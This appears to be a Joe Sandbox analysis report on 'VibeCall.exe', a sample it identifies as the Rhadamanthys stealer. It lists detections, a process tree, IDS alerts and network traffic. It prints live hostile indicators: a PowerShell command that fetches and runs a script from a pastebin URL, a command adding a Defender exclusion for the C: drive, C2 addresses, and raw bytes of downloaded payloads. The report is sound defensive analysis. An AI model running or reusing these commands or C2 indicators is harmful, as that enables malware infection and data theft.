Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VibeCall.exe

Overview

General Information

Sample name:VibeCall.exe
Analysis ID:1626653
MD5:fd33e9b2d26a30171852031ae407bef5
SHA1:646d2c13230c5b64cf0e518996d5ce9883a53e26
SHA256:b63367bd7da5aad9afef5e7531cac4561c8a671fd2270ade14640cf03849bf52
Tags:CrazyEvilexeNoLogsFebruaryuser-g0njxa
Infos:

Detection

RHADAMANTHYS
Score:84
Range:0 - 100
Confidence:100%

Compliance

Score:63
Range:0 - 100

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files to the user root directory
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • VibeCall.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\VibeCall.exe" MD5: FD33E9B2D26A30171852031AE407BEF5)
    • powershell.exe (PID: 7852 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8020 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3748 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aisolution_vibecall_a.exe (PID: 5936 cmdline: "C:\Users\user\aisolution_vibecall_a.exe" MD5: 6628422BEF4B51DC34FA30EEA184E2BE)
      • fontdrvhost.exe (PID: 5816 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 2892 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 5448 cmdline: C:\Windows\system32\WerFault.exe -u -p 2892 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 5236 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • contry_solution_vibecall_e.exe (PID: 7520 cmdline: "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe" MD5: A43F99E94BC661D7B8C675A2C58DA107)
      • fontdrvhost.exe (PID: 2116 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 6524 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
      • WerFault.exe (PID: 3496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 628 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • soundsolution_vibecall_c.exe (PID: 2056 cmdline: "C:\Users\user\Downloads\soundsolution_vibecall_c.exe" MD5: 3AFA1599179F4EEA93CC1E38D1480731)
      • OpenWith.exe (PID: 6500 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
      • WerFault.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • videosolution_vibecall_b.exe (PID: 8116 cmdline: "C:\Users\user\Downloads\videosolution_vibecall_b.exe" MD5: 999041299FD11008A384B66BCAEE5BD4)
      • WerFault.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 252 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://98.142.253.232:9364/1371e7f0dcdc621666fa156/KevlandPro"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.2761352961.0000000005010000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    0000001A.00000003.2635389333.0000000005550000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000020.00000003.2673636720.0000000005470000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000F.00000003.2613199093.0000000000A50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000020.00000003.2674081436.0000000005690000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.3.soundsolution_vibecall_c.exe.4df0000.2.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              17.3.soundsolution_vibecall_c.exe.5010000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                16.3.contry_solution_vibecall_e.exe.36b0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  32.3.fontdrvhost.exe.5690000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    44.3.OpenWith.exe.5010000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 17 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: PowerShell Download and Execution Cradles
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7852, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7852, ProcessName: powershell.exe
                      Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                      Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\Desktop\VibeCall.exe, QueryName: ip-api.com
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7852, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T18:04:34.080139+010028548242Potentially Bad Traffic98.142.253.2329364192.168.2.459636TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T18:03:12.548144+010028033053Unknown Traffic192.168.2.459320188.114.97.380TCP
                      2025-02-28T18:03:19.575661+010028033053Unknown Traffic192.168.2.459322188.114.97.380TCP
                      2025-02-28T18:03:24.756146+010028033053Unknown Traffic192.168.2.459323188.114.97.380TCP
                      2025-02-28T18:03:26.143896+010028033053Unknown Traffic192.168.2.459324172.67.74.15280TCP
                      2025-02-28T18:03:26.628289+010028033053Unknown Traffic192.168.2.459325208.95.112.180TCP
                      2025-02-28T18:03:31.012033+010028033053Unknown Traffic192.168.2.459340188.114.97.380TCP
                      2025-02-28T18:03:33.503311+010028033053Unknown Traffic192.168.2.459356172.67.74.15280TCP
                      2025-02-28T18:03:33.706438+010028033053Unknown Traffic192.168.2.459325208.95.112.180TCP
                      2025-02-28T18:03:38.034560+010028033053Unknown Traffic192.168.2.459387172.67.74.15280TCP
                      2025-02-28T18:03:38.112691+010028033053Unknown Traffic192.168.2.459325208.95.112.180TCP
                      2025-02-28T18:03:44.768985+010028033053Unknown Traffic192.168.2.459450172.67.74.15280TCP
                      2025-02-28T18:03:44.956507+010028033053Unknown Traffic192.168.2.459325208.95.112.180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T18:04:11.055722+010028548021Domain Observed Used for C2 Detected171.22.120.2334955192.168.2.459604TCP
                      2025-02-28T18:04:15.060477+010028548021Domain Observed Used for C2 Detected79.141.162.1885101192.168.2.459627TCP
                      2025-02-28T18:04:25.165053+010028548021Domain Observed Used for C2 Detected98.142.253.2329364192.168.2.459635TCP
                      2025-02-28T18:04:34.080139+010028548021Domain Observed Used for C2 Detected98.142.253.2329364192.168.2.459636TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T18:02:46.493535+010018100002Potentially Bad Traffic192.168.2.449739104.20.4.235443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 17.3.soundsolution_vibecall_c.exe.1720000.8.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://98.142.253.232:9364/1371e7f0dcdc621666fa156/KevlandPro"}
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                      Compliance

                      barindex
                      PE / OLE file has a valid certificate
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Uses secure TLS version for HTTPS connections
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.248.249:443 -> 192.168.2.4:59621 version: TLS 1.2
                      Contains modern PE file flags such as dynamic base (ASLR) or NX
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Binary contains paths to debug symbols
                      Source: Binary string: n=4.pDbZ source: powershell.exe, 0000000C.00000002.2279960715.000001A65A6A5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp37_2_00000228E9920511
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp43_2_000001C328260511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 171.22.120.233:4955 -> 192.168.2.4:59604
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 79.141.162.188:5101 -> 192.168.2.4:59627
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 98.142.253.232:9364 -> 192.168.2.4:59635
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 98.142.253.232:9364 -> 192.168.2.4:59636
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://98.142.253.232:9364/1371e7f0dcdc621666fa156/KevlandPro
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59327 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59327
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59368 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59408 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59408
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59464 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59464
                      Source: global trafficTCP traffic: 192.168.2.4:59327 -> 147.45.60.20:5000
                      Source: global trafficTCP traffic: 192.168.2.4:59604 -> 171.22.120.233:4955
                      Source: global trafficTCP traffic: 192.168.2.4:59627 -> 79.141.162.188:5101
                      Source: global trafficTCP traffic: 192.168.2.4:59316 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 17:03:12 GMTContent-Type: application/octet-streamContent-Length: 16307410Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:18:16 GMTETag: "67bf1498-f8d4d2"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 743Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qx8WDb%2FbRPnXgSyvm0gbzezirEaua%2FLaeSrWUz9WsXrHeVm1lwDeaIBFyGVovdzXw1nZW%2B5vsiTnX1LhLmsth6DCR7Rwdf13NGVZMSNRftO5Pg0nFWfcji%2F8R6cLtWZfNNI84gAg2iRueoQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191fc970c7717e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=85&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 46 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 17:03:19 GMTContent-Type: application/octet-streamContent-Length: 16308031Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:38:33 GMTETag: "67bf1959-f8d73f"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w59j9%2FnmIFT7kTY9SaTNNViNCzRnQ4BRkCW3D1ymHZe7aRBeLtJuGRK4By62v%2FjS0OfvoDqobEDNFWBZtoevpViuzIUW1Y%2BHpkGKC8OqniMG8ytS5Qrv2E6hN5e39%2FXrKkCykVdc9u%2BVw%2BE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191fcc08c8d4244-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2205&min_rtt=2205&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=90&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 